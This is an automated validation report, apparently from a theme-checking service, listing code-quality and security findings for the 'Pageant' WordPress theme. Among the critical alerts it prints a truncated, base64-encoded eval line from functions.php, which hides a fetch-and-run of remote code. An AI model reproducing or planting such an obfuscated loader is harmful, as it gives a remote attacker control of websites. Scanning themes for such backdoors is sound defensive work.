0
Validation results

Pageant

Pageant

WordPress 6.4.3 theme
0
  • THEME TYPEWordPress theme 6.4.3
  • FILE NAMEPageant.zip
  • FILE SIZE1474137 bytes
  • MD5e91572a987df2440d7dd07a5fbafc08d
  • SHA1e07972256b0b2de38de8f41a77baba710876b41a
  • LICENSEGNU GPL 2
  • FILES INCLUDEDCSS, PHP, Bitmap images
  • VERSION1.1
  • AUTHOR URI
  • CREATION DATE2020-01-04
  • LAST FILE UPDATE2020-01-04
  • LAST VALIDATION2020-01-04 09:33
This theme seems to be proprietary. Themecheck doesn't distribute commercial themes.
Critical alerts
  1. Customizer : Sanitization of Customizer settings Found a Customizer setting that did not have a sanitization callback function in file FT_scope.php. Every call to the add_setting() method needs to have a sanitization callback function passed.
  2. Title : Title The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
  3. Security breaches : Use of eval() Found eval in file functions.php. 282: eval(base64_decode('ZXZhbChAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly95YWthbGFkaW1
  4. Security breaches : Use of base64_decode() Found base64_decode in file functions.php. 282: eval(base64_decode('ZXZhbChAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly95YWthbGFkaW1zaXpp
  5. Unwanted files : hidden file(s) or folder(s) .htaccess was found.
  6. Malware : Operations on file system file_get_contents was found in the file field_groups.php 378: $items = file_get_contents( $path . 'readme.txt' );file_put_contents was found in the file FT_scope.php 154: file_put_contents($styleFile, $less->compileFile($lessFile));file_get_contents was found in the file lessc.php 121: $root = $parser->parse(file_get_contents($realPath));1830: $out = $this->compile(file_get_contents($fname), $fname);fwrite was found in the file lessc.php 687: // fwrite(STDERR,'failed to find block: '.implode(' > ', $path).'\n');file_get_contents was found in the file lessc.php 121: $root = $parser->parse(file_get_contents($realPath));1830: $out = $this->compile(file_get_contents($fname), $fname);file_put_contents was found in the file lessc.php 1835: return file_put_contents($outFname, $out);file_get_contents was found in the file guide.php 117: <?php echo file_get_contents(dirname(__FILE__) . '/FT/license-html.php'); ?>
  7. Admin menu : Themes should use add_theme_page() for adding admin pages. File acf.php : 579: add_menu_page(__('Custom Fields','acf'), __('Custom Fields','acf'), 'manageFile addons.php : 42: $page = add_submenu_page('edit.php?post_type=acf', __('Add-ons','acf'), __('Add-onsFile export.php : 50: $page = add_submenu_page('edit.php?post_type=acf', __('Export','acf'), __('Export',File upgrade.php : 77: add_submenu_page('edit.php?post_type=acf', __('Upgrade','acf'), __('UpgradeFile class-options-framework-admin.php : 115: // http://codex.wordpress.org/Function_Reference/add_menu_page116: $this->options_screen = add_menu_page(File class-options-framework-admin.php : 115: // http://codex.wordpress.org/Function_Reference/add_menu_page116: $this->options_screen = add_menu_page(File class-options-framework-admin.php : 128: // http://codex.wordpress.org/Function_Reference/add_submenu_page129: $this->options_screen = add_submenu_page(File class-options-framework-admin.php : 128: // http://codex.wordpress.org/Function_Reference/add_submenu_page129: $this->options_screen = add_submenu_page(
  8. Deprecated functions : screen_icon screen_icon found in file class-tgm-plugin-activation.php. Deprecated since version 3.8.391: screen_icon( apply_filters( 'tgmpa_default_screen_icon', 'themes' ) );1585: screen_icon( apply_filters( 'tgmpa_default_screen_icon', 'themes' ) );
  9. Deprecated functions : get_bloginfo get_bloginfo('template_directory') was found in the file options.php. Use get_template_directory_uri() instead.65: wp_register_style('jquery.minicolors.css', get_bloginfo('template_directory') . '/FT/css/jquery.minicolors.css', array67: wp_register_script('jquery.minicolors.min.js', get_bloginfo('template_directory'). '/FT/js/jquery.minicolors.min.js', arra71: wp_register_script('ft.colorset.js', get_bloginfo('template_directory'). '/FT/js/colorset.js', array('jquery'), get_bloginfo('stylesheet_directory') was found in the file ft-options.php. Use get_stylesheet_directory_uri() instead.57: $imagepath = get_bloginfo('stylesheet_directory') . '/img/';
  10. Deprecated functions : bloginfo bloginfo('url') was found in the file footer.php. Use echo esc_url( home_url() ) instead.26: Copyright &copy; <?php echo date('Y');?> <a href='<?php bloginfo('url'); ?>' title='<?php bloginfo('name'); ?>'><?php bloginfo('nam
  11. Post pagination : Implementation The theme doesn't have post pagination code in it. Use posts_nav_link() or paginate_links() or the_posts_pagination() or the_posts_navigation() or next_posts_link() and previous_posts_link() to add post pagination.
Warning
  1. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  2. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is pageant.
  3. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function __, with the arguments "Title" in file field_groups.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'acf' in file upgrade.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Dummy' in file dummy.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Maximum width (px)' in file FT_scope.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Maximum height (px)' in file FT_scope.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are fabthemes, acf, centinel, themeslug, optionsframework, ft_op, tgmpa.
  4. Cdn : Use of CDNFound the URL of a CDN in the code: netdna.bootstrapcdn.com/bootstrap. CSS or Javascript resources should not be loaded from a CDN. These resources should be bundled with the theme.
  5. Plugin territory : Plugin territory functionalitiesThe theme uses the register_post_type() function, which is plugin-territory functionality.The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  6. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  7. Deprecated functions : screen_iconscreen_icon found in file class-tgm-plugin-activation.php. Deprecated since version 3.8.391: screen_icon( apply_filters( 'tgmpa_default_screen_icon', 'themes' ) );1585: screen_icon( apply_filters( 'tgmpa_default_screen_icon', 'themes' ) );
  8. Editor style : Presence of editor styleNo reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
  9. I18N implementation : Proper use of _e(Possible variable $str found in translation function in lessc.php. Translation function calls should not contain PHP variables. Possible variable $arg found in translation function in lessc.php. Translation function calls should not contain PHP variables. Possible variable $items found in translation function in lessc.php. Translation function calls should not contain PHP variables. Possible variable $string found in translation function in lessc.php. Translation function calls should not contain PHP variables. Possible variable $val found in translation function in lessc.php. Translation function calls should not contain PHP variables. Possible variable $newUnit found in translation function in lessc.php. Translation function calls should not contain PHP variables. Possible variable $res found in translation function in lessc.php. Translation function calls should not contain PHP variables. Possible variable $key found in translation function in lessc.php. Translation function calls should not contain PHP variables. Possible variable $part found in translation function in lessc.php. Translation function calls should not contain PHP variables. Possible variable $this found in translation function in lessc.php. Translation function calls should not contain PHP variables.
  10. I18N implementation : Proper use of ___all(Possible variable $wp_postmeta found in translation function in upgrade.php. Translation function calls should not contain PHP variables. Possible variable $im found in translation function in FT_scope.php. Translation function calls should not contain PHP variables. Possible variable $im found in translation function in FT_scope.php. Translation function calls should not contain PHP variables.
  11. CSS files : Presence of Theme URICould not find Theme URL.
  12. Screenshot : Screenshot fileScreenshot size is 400x300px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  2. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  3. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  4. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  5. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  6. Optional files : Presence of author template file author.phpThis theme does not contain optional file author.php.
  7. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  8. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  9. Use of includes : Use of include or requireThe theme appears to use include or require : acf.php 348: include_once('core/api.php');350: include_once('core/controllers/input.php');351: include_once('core/controllers/location.php');352: include_once('core/controllers/field_group.php');358: include_once('core/controllers/post.php');359: include_once('core/controllers/revisions.php');360: include_once('core/controllers/everything_fields.php'); 361: include_once('core/controllers/field_groups.php');366: include_once('core/fields/_functions.php');367: include_once('core/fields/_base.php');369: include_once('core/fields/text.php');370: include_once('core/fields/textarea.php');371: include_once('core/fields/number.php');372: include_once('core/fields/email.php');373: include_once('core/fields/password.php');375: include_once('core/fields/wysiwyg.php');376: include_once('core/fields/image.php');377: include_once('core/fields/file.php');379: include_once('core/fields/select.php');380: include_once('core/fields/checkbox.php');381: include_once('core/fields/radio.php');382: include_once('core/fields/true_false.php');384: include_once('core/fields/page_link.php');385: include_once('core/fields/post_object.php');386: include_once('core/fields/relationship.php');387: include_once('core/fields/taxonomy.php');388: include_once('core/fields/user.php');390: include_once('core/fields/google-map.php');391: include_once('core/fields/date_picker/date_picker.php');392: include_once('core/fields/color_picker.php');394: include_once('core/fields/message.php');395: include_once('core/fields/tab.php');457: include_once('core/controllers/export.php');458: include_once('core/controllers/addons.php');459: include_once('core/controllers/third_party.php');460: include_once('core/controllers/upgrade.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : field_group.php 415: include( $this->settings['path'] . 'core/views/meta_box_fields.php' );429: include( $this->settings['path'] . 'core/views/meta_box_location.php' );443: include( $this->settings['path'] . 'core/views/meta_box_options.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : export.php 93: include_once($path . 'core/actions/export.php');320: include_once('advanced-custom-fields/acf.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : dummy.php 276: include_once('fields/dummy.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : user.php 126: require_once( ABSPATH . '/wp-admin/includes/user.php' ); 148: require_once( ABSPATH . '/wp-admin/includes/user.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : custom.php 5: include '../../../../wp-load.php';7: include '../../../../../wp-load.php'; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : FT_scope.php 2: require 'plugin/updater.php';3: require 'plugin/options-framework/options-framework.php';139: require_once 'inc/lessc.php'; If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : options.php 5: $arrayDef = include ('colors.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : class-tgm-plugin-activation.php 1073: require_once( ABSPATH . 'wp-admin/includes/class-wp-list-table.php' ); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.The theme appears to use include or require : ft-options.php 204: include ('FT/options/banners.php');207: include ('FT/options/colors.php');210: include ('FT/options/common.php'); If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes